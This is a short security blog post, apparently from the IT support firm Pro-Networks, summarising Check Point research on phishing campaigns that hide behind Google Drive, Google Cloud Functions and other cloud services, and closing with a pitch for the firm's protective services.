Software security company Check Point has published details of a phishing attack based on using functions from Google’s cloud services. This phenomenon also does not seem to be unique to Google either, with this attack being just part of an ongoing trend among cybercriminals for using popular cloud-based services like IBM Cloud, Microsoft Dynamics, and Microsoft Azure.
By using these services to host lure pages, attackers hide their real domain names from victims. A modified domain name often raises a red flag about the legitimacy of a website, so this technique may end up convincing more victims. What’s more, this also presents new challenges for system administrators due to the legitimate uses of cloud services. Check Point’s blog entry describes it as follows:
“Some of the warning signs that users generally look out for in a phishing attack include suspicious-looking domains, or websites without a HTTPS certificate. However, by using well-known public cloud services such as Google Cloud or Microsoft Azure to host their phishing pages, the attackers can overcome this obstacle and disguise their malicious intent, improving their chances of ensnaring even security-savvy victims.”
To highlight how attackers’ methods are evolving, the researchers give the example of an earlier campaign from January. Here, the victim is sent a link to a cloud-hosted PDF file, along with a supposed reason for opening it. On opening it, the displayed PDF page imitates a request to log in to Microsoft Share Point, either with an Microsoft 365 or an organisation ID. Clicking either link takes the victim to an imitation login page for Microsoft 365.
As both the PDF file and login page are hosted on Google Drive, the victim only ever sees legitimate Google domains, so he or she may see no reason to be suspicious. At the end of the process, the victim is delivered the PDF document that was promised in the original document, perhaps leaving him or her unaware of the attack.
While an examination of the web page reveals it loads resources from a malicious website, later versions use Google Cloud Functions to hide even this, meaning that even normally cautious targets may fall for the lure.
When investigating the domain used to load resources in the earlier attack, the researchers found it referred to an IP address in Ukraine. What’s more, this IP address, along with others on the netblock, was the destination of many other suspicious domains. This allowed the researchers to examine how these attackers had developed their methods as years passed, and how they varied their use of different cloud services in specific campaigns.
Cybercriminals are constantly adapting, but so are we at Pro-Networks. With our managed IT support services, we can help you achieve all-round protection. In this case, for example, we can mitigate the threat by ensuring that all Microsoft 365 accounts are secured with multifactor authorisation, as well as by educating your employees about how to spot potential attacks.